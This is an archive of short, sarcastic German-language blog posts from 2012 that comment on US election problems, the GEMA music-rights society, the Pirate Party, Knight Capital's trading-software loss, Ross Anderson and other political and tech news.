- Währenddessen im Fox News-Paralleluniversum: Bedrohlicher Schwarzer von den New Black Panthers schreckt Wähler ab (und dann sieht man den Typen einer älteren weißen Dame die Tür aufhalten)
- Immer noch stundenlanges Warten in Florida, aber ein Wahlbehördensprecher findet, das seien nur ein paar "Hiccups". Tut ja auch alles prima aus deren Sicht, das war ja alles absichtlich so ausgelegt.
- Greg Palast über stinkende Tricksereien in Ohio
- Das Klage gegen das Softwareupdate für die Wahlcomputer in Ohio wurde abgewiesen, weil die halt nur Spekulationen und keine Beweise für Betrug hatten. Der Richter fand, eine Hintertür, die Zugriff auf die SQL-Tabellen hat, sei noch kein ausreichender Grund für eine Klage.
- In Philadelphia sind mysteriös Wähler aus dem Register verschwunden und werden jetzt mit "provisional ballots" abgespeist.
- Grandiose Fotoserie von Wahllokalen in den USA. Geht los mit Las Vegas. Wahlcomputer neben Slot Machines. Und letztere sind besser reguliert. Aber auch der darunter mit den Geweihen an der Wand, ganz großes Kino. Und der weiter unten in dem Einkaufszentrum, neben den Rolltreppen. WTF? "Ja aber hat doch Sichtschutz!1!!"
- Einbruch im Wahlhauptquartier der Democrats in Seattle, Washington State
- In der Tat ist die Nachfrage nach Email-Voting gerade enorm hoch in New Jersey, daher haben sie die Frist verlängert, aber man muss bis heute abend beantragen. Spielt am Ende keine große Rolle, weil New Jersey kein Swing State ist und wahrscheinlich eh an Obama geht.
- Es bildet sich da gerade ein lustiges Narrativ heraus, von Leuten, die unter Extrembedingungen zur Wahl gehen. Von der Frau, der die Fruchtblase platzt und die im 5-Minutenabstand-Kontraktionen hat und vor dem Krankenhaus noch schnell wählen fährt über eine Frau, die mit dem Katheder aus dem Krankenhaus rannte, um Wählen zu gehen (ich glaube die meinen da so eine Infusion) bis hin zu dem Mann, der beim Wählen stirbt, wiederbelebt wird, und als erstes wissen will, ob er gewählt hat.
- Lange Schlangen vor dem Wahllokal auch in Minnesota
- Vier Stunden Wartezeit vor dem Wahllokal auch in Virginia
- Die Email-Situation in Essex County, New Jersey, ist wohl echt apokalyptisch. Wenn man da seine Stimme einsenden will, kriegt man ein "Inbox full" als Fehler zurück. m( Wenn man auf der Webseite vom Wahlbüro nachguckt, kriegt man eine andere Adresse, die geht auch nicht. Wenn man auf der Facebook-Seite (!) vom County Clerk nachguckt, hat er da gepostet, man soll das an seine private Hotmail-Adresse mailen und er sortiert das dann schon richtig. Mal abgesehen von den offensichtlichen Problemen hier vermute ich mal, dass Hotmails automatisierte Fraud- und Spamerkennung nach ungefähr 10 Minuten alle einkommenden Stimmen für ein neues Spam-Botnet halten und wegschmeißen wird.
- "my mom just voted and the woman took the ballot and put it UNDER the box, instead of having my mom insert it into the box". Wait, what?!
- Noch ein Update zu den langen Wahlzetteln in Florida: die formulieren das dann so, dass man "yes" stimmen muss, um einen Vorschlag abzulehnen. D.h. einfach überall "dagegen" geht nicht, man muss das alles lesen und verstehen.
- In Indiana bleiben Wahllokale länger offen, weil noch Warteschlangen abzuarbeiten sind.
- Der Hotmail-Account, den sie in New Jersey zum Email-Voting nehmen, wurde schon gehackt. Die Frage fürs Passwort-Reset war der Mädchanname der Mutter.
- Kaputte Wahlmaschinen auch in Pennsylvania.
Übrigens sei zu dieser langen Liste mal angemerkt, dass das alles irgendwelche Lokalzeitungen sind. In den landesweiten Medien ist Wahlbetrug kein Thema. Immerhin ist Voter Suppression im Wortschaft von MSNBC angekommen, die als der linkeste der großen Sender gelten. Bei Fox News gibt es zwar Meldungen über Wahlbetrug, aber das sind halt so Fox-News-Realitätsblasen-Halluzinationen. Die verstehen darunter, dass Democrats sie mit ihren Voter-ID-Geschichten nicht durchkommen lassen. CNN? Nichts, weit und breit. NBC berichtet über "glitches", aber meint damit Überlastung beim Email-Notfallvoting in New Jersey. Im Mainstream-Narrativ kommt so gut wie nichts an. Wobei das nicht komplett stimmt. Ausnahmen bestätigen die Regel.

Mon Nov 5 2012

[l] Wir haben hier ja unsere Probleme mit Wikipedia-Editoren, aber dass die dann die Presse ausfindig macht und zuhause besucht und zur Rede stellt, das kam m.W. noch nicht vor.
In den USA hat ein einzelner Editor verhindert, dass die WP-Seite über Hurricane Sandy "climate change" oder "global warming" erwähnt. Das Portrait, das sie da von dem Mann zeichnen, ist durchaus interessant. Sie haben auch ein Foto gemacht.

Sat Nov 3 2012

[l] Apple hat ihre UK Homepage gemäß den Anforderungen des Gerichts angepasst. Sie haben sich an die Buchstaben gehalten, nicht wie es gemeint war. Der Text ist jetzt größer, aber er ist ganz am Ende und sie haben den Teil oben größer gemacht, damit das auch in Fullscreen auf einem 1920x1200 Bildschirm nur nach Runterscrollen zu sehen ist. Glaubt ihr nicht? Hier hat jemand Vorher-Nachher-Screenshots gemacht.
Ich finde ja, wenn Apple sich wie ein schlecht erzogenes Kleinkind verhält, dann sollte der Richter einmal übers Knie legen des Vorstandes verhängen. Oder von mir aus kein Taschengeld mehr. Internetverbot vielleicht?
Update: Das wird per Javascript immer so skaliert, dass das Kleingedruckte nur durch Runterscrollen erreichbar ist.

Sun Oct 21 2012

[l] Guckt mal, Israel ist so altruistisch, die denken immer nur an die Gesundheit und das Wohlergehen anderer. Z.B. als sie den Gazastreifen auf "Diät" gesetzt haben. Sie haben sich extra Gedanken gemacht, wie sie die Leute möglichst doll hungern lassen können, ohne die Kriterien für Unterernährung zu erfüllen.
The Israeli military made precise calculations of Gaza's daily calorie needs to avoid malnutrition during a blockade imposed on the Palestinian territory between 2007 and mid-2010, according to files the defence ministry released on Wednesday under a court order.
Das Militär hat darauf antworten lassen, dass es ihnen darum gegangen sei, eine humanitäre Krise zu vermeiden, nicht die Leute hungern zu lassen. Na dann ist ja gut.

Fri Oct 19 2012

[l] Stellenausschreibung der Woche:
Das Bundesverwaltungsamt sucht für eine Sicherheitsbehörde im Großraum Köln engagierte und motivierte Observationskräfte.
Köln, "Sicherheitsbehörde" sucht "Observationskräfte", nein, nicht was ihr denkt. Eher die hier.
Krass, so verzweifelt sind die, dass sie jeden als Schnüffler einstellen und nicht mal mehr gezielt nach Verrätern in den jeweils zu observierenden Gruppen suchen. Wieso haben wir diesen Laden eigentlich noch nicht zugemacht?

Tue Oct 16 2012

[l] Dem Weltwährungsfonds fällt auf, dass ihre Sparauflagen die Länder kaputtgemacht und nicht saniert haben. Wow. Nach nur wenigen Dekaden fällt ihnen das jetzt auf. Naja, man soll dem geschenkten Gaul nicht ins Maul schauen.

Mon Oct 15 2012

[l] Polizei-SWAT-Team detoniert Flashbang-Granate in Kinderzimmer, erzeugt Verbrennungen 2. Grades beim darin schlafenden 12-jährigen Mädchen. Begründung: sie hatten ein Meth Lab vermutet. Aber sorgt euch nicht, denn:
"We generally do not introduce these disorienting devices when [children are] present," Police Chief Rich St. John explained later.
Phew! Ich hätte mir da fast Sorgen gemacht.
Immerhin ist die Polizei einsichtig. Oder so.
"If we're wrong or made a mistake, then we're going to take care of it," St. John said, "But if it determines we're not, then we'll go with that"
"If"? Und "take care of it" klingt jetzt auch nicht nach rückhaltloser Aufklärung und schlimmen Konsequenzen, eher so nach "dann schicken wir ne Postkarte".

Tue Oct 9 2012

[l] Fotos von einer Wolke gemacht? Da kommt gleich mal das FBI zur Befragung. Land of the Free! Home of the Brave!

Fri Oct 5 2012

[l] Ross Anderson spricht aus, was viele schon länger befürchtet haben:
Researchers are purposefully placing bugs in open source software during the development stages, so that when code appears in completed products, those same researchers can highlight the flaws and profit from them where companies are willing to pay, Anderson has told TechWeekEurope. He claimed to know of several projects where this has happened, but declined to name names.
Mit "companies" sind hier die 0-day-Buden gemeint, über die wir uns auch in Alternativlos 25 unterhalten hatten. Ross Anderson ist ein britischer Professor und einer der coolsten Leute, die es auf dieser Welt gibt. Wer das nach der Lektüre seines großartigen Buches "Security Engineering" nicht auch findet, für den habe ich noch eine kleine Anekdote.
Das Bundesinnenministerium hatte eine Tagung organisiert, bei der es um Trusted Computing gehen sollte, Palladium war damals das Stichwort, und die Experten warnten vor Orwellschen Zuständen und erinnerten an die Vorgängertechnologie, bei der jede Intel-CPU eine eindeutige Seriennummer haben sollte, die per Software abfragbar ist. Das hatte ein öffentlicher Aufschrei verhindert, und das war der Präzedenzfall für Palladium, was im Wesentlichen eine Microsoft-Initiative war. Microsoft sah schlicht, dass sie den Kampf gegen Viren und Würmer verloren haben, solange man ihre Lösung Code Signing per Manipulation der Boot-Chain umgehen kann, wofür damals Software öffentlich vorgeführt worden war. Also musste das Code Signing früher ansetzen, schon im BIOS, und das Konzept dafür hieß Palladium. Das Innenministerium war besorgt und lud zu dieser Veranstaltung ein.
Als Experten waren u.a. ein Pressefuzzy von Microsoft geladen, und Ross Anderson, und vom CCC war auch jemand dabei, so kam ich als Kofferträger in die Veranstaltung rein. Der Pressefuzzy von Microsoft hielt zuerst seine Präsentation, wo er mit Powerpoint ein Multimedia-Desaster an die Wand projizierte, so mit animierten kleinen Viren, wie in der alten Zahnpastawerbung, die dann am Rechner hochkletterten, es war grotesk. Und danach war Ross Anderson dran. Der Projektor wurde ausgeschaltet. Jemand trug einen OH-Projektor rein. Ross Anderson legte handgemalte Folien auf. Handgemalt! Mit farbigen Filzstiften! Verschiedene Textpassagen mit anderen Farben, je nach Wichtigkeit. Das war so ein Kontrastprogramm, dass das Publikum erstmal ihren Kulturschock überwinden musste. Aber niemand sagte was, und Ross zog das mit einer professoralen Coolness ab, die ich so noch nie irgendwo anders gesehen habe. Der Mann rockt einfach.
Oh und man muss wissen, dass er an der Cambridge University eine Abteilung für Sicherheitsforschung aufgebaut hat, die seit Jahren die Bankindustrie geradezu vorführen, weil sie nacheinander alle Generationen von Chip&Pin-Karten und zwischendurch einige Hardware-Kryptomodule zerlegt haben. Von der Gruppe kommen auch häufig Hacker und tragen auf dem CCC-Congress vor. Gute Leute, diese Gruppe.

Thu Oct 4 2012

[l] Man kann ja sagen was man will über das Politklima in Amerika, aber eine Sache muss man Romney wirklich zu Gute halten: Er hat es geschafft, dass Fact Checking wieder cool und hip ist.
Seit Jahren haben die einfach alle gelogen, dass sich die Balken biegen, und es gab irgendwelche obskuren Fact Checking-Webseiten, die dann immer geguckt haben und "das war gelogen" dranschrieben, aber jetzt ist das plötzlich so im Fokus der Aufmerksamkeit, dass aus Romneys Mund einfach nur gequirlte Kuhscheiße rauskommt, dass sogar CNN angefangen hat, die Aussagen mal nachzuprüfen! CNN! Wann haben DIE denn das letzte Mal Nachrichten gemacht?! Kann ich mich gar nicht mehr dran erinnern! Und jetzt prüfen die plötzlich Aussagen!? Wow!

Sat Sep 29 2012

[l] Die deutsche Kriminalpolizei befragt offenbar regelmäßig Hellseher und andere Scharlatane.
Allerdings hat die »Vernehmung« wohl ungefähr so ausgesehen: »Sie hat einen Kassettenrekorder genommen und eine Pause gemacht und den Kollegen gefragt, ob er die Stimmen hört« hat er aber nicht.
Da drängt sich die Frage auf, ob die nach so einer Vorstellung wieder zu Hellsehern gehen würden. Das fragte auch der Untersuchungsausschuss. Antwort:
Weber antwortete mit Ja, man müsse »alle Möglichkeiten ausschöpfen«.
Na ein Glück, dass wir so einen Überschuss an Steuermitteln haben, dass wir uns die Subventionierung von Scharlatanen leisten können. Ich hätte angenommen, dass die Polizei solche Leute zum Schutze der Bevölkerung wegsperrt und ihnen nicht noch Geld gibt.

Wed Sep 26 2012

[l] In Katalonien waren 1.5 Millionen Menschen auf der Straße, um für größere Unabhängigkeit vom Rest von Spanien zu demonstrieren. Das ist ein Fünftel der Bevölkerung in der Region. So langsam müssen wir uns also mit der neuen Realität beschäftigen, dass die reicheren Teile einzelner EU-Länder sich abspalten könnten, um nicht mehr am Aderlass für die Banken-Bailouts und den EU-Stabilitätskram zu hängen. Ich sage absichtlich nicht: weil sie für die Armen nicht mehr zahlen wollen. Denn das haben sie gemacht, seit dem 2. Weltkrieg. Erst jetzt, mit den Banken-Bailouts und der immensen Monsterschuldenlast, reden die von Sezession. Und wie reagiert die EU? Kann man sich gar nicht ausdenken!
the European commission president, José Manuel Barroso, indicated this week that any new state would have to apply to join the EU.
Und der Depp meinte das bestimmt als Drohung! Was für ein Vollpfosten! Das wäre doch gerade der Grund, wieso die sich abspalten wollen! Nicht um von Spanien wegzukommen, sondern um von Spanien und der EU wegzukommen! Diese EU-Kommission scheint ja echt nur aus Versagern zu bestehen.

Fri Sep 21 2012

[l] Electronic Arts hat Bioware kaputtgemacht. Das haben eh schon alle schon immer gesagt, seit klar war, dass EA Bioware kaufen würde. Aber jetzt schmeißen die Gründer von Bioware offiziell hin. D.h. die haben schon vor einem halben Jahr EA ansagen müssen, dass sie gehen wollen. Da waren Mass Effect 3 und STTOR frisch draußen. Da wäre ich glaube ich auch gegangen, nachdem EA die beiden Franchises so in den Boden gerammt hat. Mit dem total verkackten Multiplayer und Ende bei Mass Effect und mit dem völlig planfreien SWTOR-Gewurschtel, das war der richtige Zeitpunkt zum Gehen.
Ein weiterer trauriger Höhepunkt auf EAs Vernichtungsfeldzug gegen die Computerspieleindustrie. Meine Theorie ist ja: Wenn EA keine guten Spiele macht, darf auch sonst keine Firma existieren, die gute Spiele macht. Alle plattmachen!1!!
Sehr, sehr schade. Bioware-Spiele habe ich immer gerne gespielt. Hoffentlich kauft EA nie Bethesda oder Obsidian.

Thu Sep 20 2012

[l] Bettina Wulff stellt ihr Buch kostenlos als PDF ins Web. Well played, Frau Wulff! Gerade im Kontext eines gewissen anderen Buches, das hier nicht erwähnt werden soll. Das muss gerade schmerzen, ein Pirat zu sein. Wenn man öffentlich so bloßgestellt wird. Von Bettina Wulff! Die wurde ja bei den Rezensionen zu einem gewissen anderen Buch, das hier nicht erwähnt werden soll, auch mehrfach erwähnt. Als die deutlich bessere Autorin.
Nicht dass ich das eine oder das andere Buch lesen wollen würde. Aber das hier, das muss man schon würdigen. Respekt!
Update: Ach das war gar nicht die Bettina Wulff! Na da hatte aber ein Troll ein gutes Gespühr für Timing. (Link weggemacht)

Sun Sep 16 2012

[l] Fnord des Tages: McDonald's hat eine Filiale in Indien aufgemacht. Das wirkt nicht auf Anhieb wie eine schlaue Idee, weil das eine Burgerkette ist, und in Indien die Hindus kein Rindfleisch und die Moslems kein Schweinefleisch essen. Aber Kapitalismus ist alles, nur nicht unflexibel. Daher … wird es die erste vegetarische McDonald's-Filiale. WTF?
[l] Die Piratenpartei Berlin möchte die Schulpflicht abschaffen. Nicht nur von Nazis und Lobbyisten unterwandert, sondern auch von "Home Schooling"-Fans aus der Fundichristen-"Freikirchen"-Extremismusabteilung? Na SUPER, liebe Piraten!
Update: Wenn ihr beobachtet habt, wie sie in Deutschland das Krankenversicherungs- und Rentensystem kaputtgemacht haben, indem sie "private Alternativen" zugelassen haben, wird euch die Argumentation in diesem Antrag bekannt vorkommen. Da können die hundertmal dranschreiben, dass das keine Homeschooling-Initiative ist. Genau das ist es. Nichts anderes. Lest euch nochmal Greg Palast zu "No Child Left Behind" durch.
Update: Ich streite mich gerade mit Frank, ob es hier um Fundichristen oder um Elitenzementierung geht. Frank meint, das sei nicht von Fundichristen sondern von noch schlimmeren Leuten, von "Freischulen". 20% der Kinder können frei lernen, der Rest braucht von außen Struktur. Die 20% werden auch so einen Vorschlag überleben, der Rest wird verlieren. Das ist die "online lernen ist eh die Zukunft, wozu brauchen wir noch Schulen"-Fraktion. Das sind Leute, die in der Schule wenig Spaß hatten.

Thu Sep 13 2012

[l] Herzlichen Glückwunsch an die Studentenvertretungen in Sachsen. Offensichtlich habt ihr euren Job so hervorragend gemacht, dass ihr aufs Zielradar der CDU und der NPD gekommen seid, und die wollen euch jetzt abschießen. CDU und NPD, da wächst zusammen, was zusammen gehört. Widerlich. (Danke, Fredo)

Wed Sep 12 2012

[l] Achmedinedschad meckert, dass ihre Feinde die Wolken zerstören, bevor sie im Iran abregnen können. In der Region gibt es halt immer noch die besten Verschwörungstheorien. Technisch ist es sogar möglich, Wolken künstlich abregnen zu lassen. Die Sowjetunion soll das immer gemacht haben, um bei ihren Militärparaden schönes Wetter zu haben :-)
Update: Das ist auch in Deutschland Standard mit der Wetterbeeinflussung. (Danke, Rop)

Mon Sep 10 2012

[l] Neuer Militär-Roboter kann 45 km/h schnell rennen. Das hat vor ein paar Tagen Schlagzeilen gemacht. Ich fand das nicht erwähnenswert, weil ich Militär- und Waffen-Pornographie nicht leiden kann. Oh ihr habt ein neues Tötungsinstrument, na wunderbar! Da könnt ihr aber stolz sein, das bringt die Zivilisation bestimmt deutlich voran. Aber guckt mal, wen die BBC da um Kommentar gebeten hat:
Noel Sharkey, professor of artificial intelligence and robotics at the University of Sheffield, has mixed feelings about the development.
Und der hatte das hier zu sagen:
"It's an incredible technical achievement, but it's unfortunate that it's going to be used to kill people," he suggested.
Wunderschön! Ein Orden für den Professor! Das würde ich mir viel häufiger wünschen, dass Kommentatoren genug Arsch in der Hose zu haben, das einfach jedes Mal dazu zu sagen, wenn wieder irgendein tolles Militärprojekt "Früchte" trägt. Der neue Düsenjäger ist noch schneller als der alte? "Tolle technische Errungenschaft; schade nur, dass das zum Töten verwendet werden wird." Sollte man sich ausdrucken und an die Wand hängen.

Sat Sep 8 2012

[l] Nach dem Totalverkacken des Berliner Flughafens brauchte der Wowereit ein Thema, mit dem er wieder Sympathien gewinnen kann. Ein einfaches Thema, eines wo jeder sofort hinter ihm steht. Was liegt da näher als die GEMA? :-)
Der Regierende Bürgermeister von Berlin sagte auf der Jubiläumsfeier von Universal Music, die Clubszene dürfe nicht von der GEMA ausgepresst werden. Klaus Wowereit merkte an, die GEMA vertrete lediglich die Interessen weniger und ziele auf eine ungerechte Umverteilung ab.
Klar ist das plumper Populismus, aber ich bin das zu verzeihen bereit, wenn da jetzt auch Taten folgen.

Tue Sep 4 2012

[l] Wo wir gerade beim Hugo Award waren, der von DRM kaputtgemacht wurde: Apple plant wohl, die Kamera je nach Geolokation zu deaktivieren, vermutlich damit man im Kino nicht den Film mitschneiden kann mit seinem Telefon. Jedenfalls haben sie etwas in die Richtung patentiert. (Danke, Simon)

Mon Aug 27 2012

[l] Das Amtsgericht Frankfurt hat im Streit Gema gegen Musikpiraten für die Gema entschieden. Es geht um die "Gema-Vermutung".
[Die Gema] hatte es abgelehnt, für das Stück die Gemeinfreiheit zu bestätigen, da es anonym eingereicht worden sei. Der Streit basiert auf der sogenannten Gema-Vermutung: Wer Musik öffentlich aufführt oder gewerblich nutzt, muss beweisen, dass sie nicht der Gema unterliegen oder Gebühren zahlen.
Diese Gema-Vermutung muss weg, das ist die zentrale ungerechtfertigte Ermächtigungsklausel für die Gema. (Danke, Thomas)

Sun Aug 26 2012

[l] Paul Ryan in einer Rede vor der Atlas Society:
But the reason I got involved in public service, by and large, if I had to credit one thinker, one person, it would be Ayn Rand. And the fight we are in here, make no mistake about it, is a fight of individualism versus collectivism.
Wer mit dieser Meldung nichts anzufangen weiß, dem kann ich nur dringend ans Herz legen, sich mal drei Stunden (oder besser gleich ein-zwei Tage, denn da braucht man Zeit, um das zu verarbeiten und zu reflektieren) Zeit nehmen und sich All Watched Over by Machines of Loving Grace von Adam Curtis anzugucken. Gibt es bestimmt im Internet, kurzes Googeln findet z.B. das hier. Drei Teile mit jeweils 60 Minuten Länge. Wikipedia hat ein bisschen Hintergrund zu Ayn Rand. Im Wesentlichen dient ihre Philosophie des Objektivismus als moralische Grundlage und Selbst-Rechtfertigung der Neocon-Bewegung. Man könnte sagen: DIE ist an allem Schuld.
Update: archive.org hat die auch! Oh und wenn euch das gefällt: Der Mann hat noch mehr sehenswerte Dokumentationen gemacht.

Sat Aug 25 2012

[l] Die Polizei, dein Freund und Helfer: Bei dem Feuergefecht im Empire State Building hat die Polizei keine gute Figur gemacht. Sieht so aus als habe der Täter nur ein Ziel gehabt, seinen früheren Chef. Die anderen 9 angeschossenen Passanten sind alle von den ihn verfolgenden Keystone Kops verletzt worden.

Fri Aug 17 2012

[l] Wartet hier noch jemand auf eine Presseerklärung oder coole Aktion der Piraten zum Verfassungsgerichtsurteil? Zum Berliner Flughafen vielleicht? Zu McAllisters Selbstgesprächen? Zu dem Gema-Ding mit den "mafiösen Strukturen" hätte man auch was machen können. Oder wie wäre es mit Trapwire? Das BGH-Tauschbörsen-Urteil?
Nichts.
Aber wisst ihr, wozu sie was gemacht haben? Kommt ihr NIE drauf! Gegen den Kauf von Steuersünderdaten haben sie geklagt.
Die müssen echt aufpassen, dass sie nicht mit der FDP verwechselt werden. Auch von der Farbgebung her.
Andererseits… who cares. Beides belanglose Randgruppenparteien, die als es drauf ankam ihren Arsch nicht hochgekriegt haben und keine erwähnenswerten inhaltlichen Punkte haben, die für ihre Wahl sprächen.
Update: Kriege ne Mail von einem Juristen. Sie haben nicht mal geklagt, sie haben nur angezeigt. Und im Übrigen soll ich mich nicht so haben, die hätten ja was getwittert. Keine weiteren Fragen, Euer Ehren.
Na gut, doch. Eine habe ich. WTF?!

Thu Aug 16 2012

[l] Angeblich haben die Briten gedroht, die Botschaft von Ecuador zu stürmen, um Julian Assange festzunehmen. Das wäre ein diplomatischer Schlag ins Gesicht nicht nur von Ecuador und hätte sicher ein diplomatisches Nachspiel auch mit anderen Ländern in der Gegend. Insofern wundert mich nicht, dass sie das jetzt auch gleich wieder "vorerst" dementiert haben. Das kann ich mir nicht vorstellen, dass England so tief sinkt. Noch nicht. Aber leider scheint das ja deren Spezialität zu sein, Erwartungen eines Mindesmaßes an zivilisatorischer Errungenschaft dann später zu enttäuschen. Da muss man schon den Iran zitieren, um ein Beispiel zu finden, wann das mal jemand gemacht hat. Und selbst der hat lieber Studenten vorgeschickt.
Update: Craig Murray erklärt die Sachlage und meint dazu folgendes:
This terrible breach of international law will result in British Embassies being subject to raids and harassment worldwide.
Das wäre der Brüller, wenn der Iran und China dann im Wochenrhythmus die britische Botschaft bei sich durchsuchen.

Wed Aug 15 2012

[l] Wieviel Kohle machen die Behörden eigentlich mit Adresshandel? Ein paar Piraten haben mal gefragt.

Sun Aug 12 2012

[l] Der Dekan der Rechtswissenschaftlichen Fakultät der Uni Münster wird von der Gema abgemahnt. Grund: er hatte von "mafiösen Strukturen" in der Gema gesprochen. Die Reaktion des Mannes:
Nun gut - sei es drum. Die Gema hat natürlich nichts mit der Mafia zu tun. Es gibt da viele Unterschiede, unter anderem agiert die Mafia von Italien, die Gema von München aus, schneidet Abtrünnigen Finger ab (ist mir als Praxis bei der Gema unbekannt); ist/war die Mafia in unerlaubte Prostitution, Mord, Geldwäsche verwickelt, die Gema nicht.
Hrhrhr (Danke, Stefan)

Sat Aug 11 2012

[l] Wisst ihr, was der neue Chef der Gematik (die mit der Gesundheitskarte) vorher gemacht hat?
Kommt ihr NIE drauf!
Er war kaufmännischer Geschäftsführer der Nürburgring GmbH.
Nürburgring, Nürburgring, da war doch was…

Fri Aug 10 2012

[l] Vor ner Woche gab es einen spannenden Fall, wo eine Firma am NYSE eine Robo-Trading-Software ausgerollt hat, die dann statt "buy low sell high" das Gegenteil tat. Ich hoffte, dass da noch ein paar Details kommen, zu denen ich mehr sagen kann als in der Presse steht, aber das scheint nicht der Fall zu sein, daher blogge ich das jetzt halt ohne tolle zusätzliche Einsichten.
Insgesamt scheint das ein gutes Beispiel dafür zu sein, wieso Release Management wichtig ist. Das war gar nicht so, dass die Software völlig kaputt war, sondern die war im Testmodus konfiguriert, wo sie zum Simulieren eines Marktes immer am oberen Ende des Spreads Käufe in den Markt getreten hat, und am unteren Ende Verkäufe. Erfahrene Beobachter werden an der Stelle merken, dass man normalerweise billig kauft und teuer verkauft, nicht anders herum, sonst macht man Verlust statt Profit, und so war es dann auch. Innerhalb von 45 Minuten hat die Software 440 Millionen Dollar verpufft. Das klingt barbarisch viel, aber noch nicht so schlimm wie die anderen Milliardenverluste, von denen wir in letzter Zeit so gehört haben, z.B. der Jerome Kerviel, falls sich noch jemand an den erinnert, der fast fünf Milliarden verbrannt hat. Aber das war Lebensleistung, in diesem Fall war das innerhalb von 45 Minuten. Wenn man dieser Software so viel Zeit gelassen hätte wie den Menschen, dann wäre das noch mal eine ganz andere Kategorie geworden. Das ist schon die Kernschmelze, was hier passiert ist.
Bei der Gelegenheit stellen sich natürlich diverse Fragen. Erstens: wie konnte das durch die Qualitätssicherung? Wieso hat das nicht sofort jemand gemerkt? Ich weiß ja nicht, wie das bei euch ist, aber wenn ich ne neue Softwareversion einspiele, dann beobachte ich die erstmal ein paar Minuten, um zu gucken, ob was offensichtliches kaputt ist. Das dauert doch keine 45 Minuten, bis ich merke, dass meine Tradingsoftware nur Verlust einfährt!?
Und dann die Größenordnung. Die Berichte gehen auseinander, aber von 70% bis 100% der Marktkapitalisierung von Knight Capital hab ich gehört. Hallo? Bei so einem Laden fällt erst auf, dass gerade was schief läuft, wenn schon 50% des Kapitals weg sind!?!?
Dann: die Börsen haben Testsysteme zum Testen. Solche Software würde man an einem Testsystem testen, nicht am Livesystem. Kann sein, dass sie das gemacht und dann die Test-Config-Dateien mitkopiert haben. Oder sie haben es direkt am Livesystem getestet. Beide Optionen lassen tief blicken.
Kurz gesagt: wenn die auf dem Niveau arbeiten an den Kapitalmärkten, dann wundert mich gar nichts mehr. So eine Schlamperei würde man vielleicht von der Polizei oder der Bundeswehr erwarten, aber doch nicht vom freien Markt?! Private Betriebe sind doch so viel effizienter als Staatsmanagement!1!!

Fri Aug 3 2012

[l] Wo wir gerade bei Gefängnisprivatisierung waren: Goldman Sachs ist jetzt für die Insassen-Resozialisierung im Rikers Island Gefängnis von New York zuständig. Und wir haben ja gerade gelernt, dass die Profitinteressen von Gefängnisprivatisierung genau in die andere Richtung gehen, nämlich keine Resozialisierung. Genau wie im Einzelhandel geht es da um Auslastungsmaximierung und "Kundenbindung".
Übrigens sei an der Stelle auf ein wunderbares anderes Beispiel für erfolgreiche Privatisierung verwiesen, geradezu die Großmutter aller Private Public Partnerships: die General Motors streetcar conspiracy.
During the period from 1936 to 1950, National City Lines and Pacific City Lines—with investment from GM, Firestone Tire, Standard Oil of California, Phillips Petroleum, Mack Trucks, and the Federal Engineering Corporation—bought over 100 electric surface-traction systems in 45 cities including Baltimore, Newark, Los Angeles, New York City, Oakland and San Diego and converted them into bus operation.
Am Ende haben sie die Straßenbahn kaputtgemacht, damit sie den Leuten mehr Autos verkaufen können.

Sun Jul 29 2012

[l] Die GEMA macht eine Ausnahme für Karnevalsvereine, für die sollen die neuen Tarife erst ab Aschermittwoch in Kraft treten. Wenn Karneval vorbei ist, also.

Sun Jul 22 2012

[l] Konservatismus kommt von "low effort thinking". Wenn man diese These als Psychologe überprüfen will, dann muss man schon tief in die Trickkiste greifen. Die vier Experimente, die sie am Ende gemacht haben, sind entsprechend unterhaltsam. Es ging von Fragebögen in Bars mit Blutalkoholtests ("Da Alkohol das Denken beeinträchtigt, werde dadurch die Ausgangshypothese verstärkt") über Fragen beantworten, während nebenher kognitiver Druck (andere Aufgaben müssen parallel bewältigt werden) haben sie auch verschieden starken Zeitdruck vorgegeben, um die Denkzeit pro Frage zu begrenzen. Die Ergebnisse zeigten übereinstimmend eine Korrelation zwischen konservativem Denken und "hatte keine Zeit, richtig über das Problem nachzudenken".

Fri Jul 13 2012

[l] Also Humor haben die ja bei der Uno. Nach dem Treppenwitz, Tony Blair zum Friedensbotschafter im Nahen Osten zu machen, haben sie jetzt Gordon Brown zum Bildungsbotschafter gemacht. Denn wenn ich an hervorragende Bildung und ein vorbildliches Schulsystem denke, na klar, dann denke ich auch zuerst an England!1!!
[l] Habt ihr euch auch gefragt, wie es dazu kommt, dass die CSU das Meldegesetz so bürgerunfreundlich gemacht hat? Hier ist die Antwort: Laut taz arbeitet der Bosbach nebenbei als Berater für eine Telefonmarketingfirma. Na dann ist ja alles klar.

Tue Jul 10 2012

[l] Wo wir gerade beim "Verfassungsschutz" waren: Ein paar Zitate aus dem NSU-Untersuchungsausschuss des Thüringer Landtags. Die Titanic kann einpacken, mit der Realität kann keine Satirezeitschrift mithalten. Ihr müsst ein bisschen runterscrollen, zu den Aussage von dem Roewer. Da bleibt kein Auge trocken.
9. “Es wurde aus unserem Amt versehentlich mal ein Fax an die Grünen geschickt, mit einer Personenliste von PDS-Abgeordneten. Das Fax sollte eigentlich an die CDU gehen und war aber gar nicht autorisiert, ein Mitarbeiter hat das ohne Absprache mit mir gemacht, ich war da im Urlaub”
Äh … nee klar. Und der Kracher:
10. “Wie ich Verfassungsschutz-Präsident wurde? Es war an einem Tag nachts um 23 Uhr, da brachte eine mir unbekannte Person eine Ernennungs-Urkunde vorbei, in einem gelben Umschlag. Es war dunkel, ich konnte sie nicht erkennen. Ich war außerdem betrunken. Am Morgen fand ich den Umschlag jedenfalls noch in meiner Jacke.”
Aha. Soso.
Update: Auch das ehemalige Nachrichtenmagazin hat Spaß mit der Sache.

Wed Jun 27 2012

[l] In dem Rennen darum, wer die faschistischsten Einschränkungen für Copyright und das Internet vorschlagen kann, fühlt sich die WIPO in letzter Zeit übergangen und prescht daher mit einem besonders hirnrissigen Vertrag vor.
Die Übereinkunft gibt Darstellern in audiovisuellen Aufführung das Recht, 50 Jahre lang ausschließlich über die Nutzung seines Werks bestimmen zu können.
Vielleicht missverstehe ich gerade, was ein audiovisuelles Werk ist, aber heißt das nicht, dass jeder Statist in einem Kinofilm die Aufführung des Films verhindern kann?
Oh und falls jemand nicht mehr auf dem Radar hat, was für ein verwerflicher Laden die WIPO ist: siehe hier und hier. Die WIPO hatte sich in den letzten Jahren vom Gebetsmühlen-Kanon wegbewegt und Dinge gesagt wie dass man bei einer so weitverbreiteten Sache vielleicht nicht mehr von Piraterie sondern von Änderung der Umstände reden müsse oder dass das Patentsystem Scheiße ist. Daraufhin haben die Amis halt ACTA an der WIPO vorbei gemacht, und schwupps ist der Laden wieder auf Linie. Klientelpolitik würde man das bei der FDP nennen.
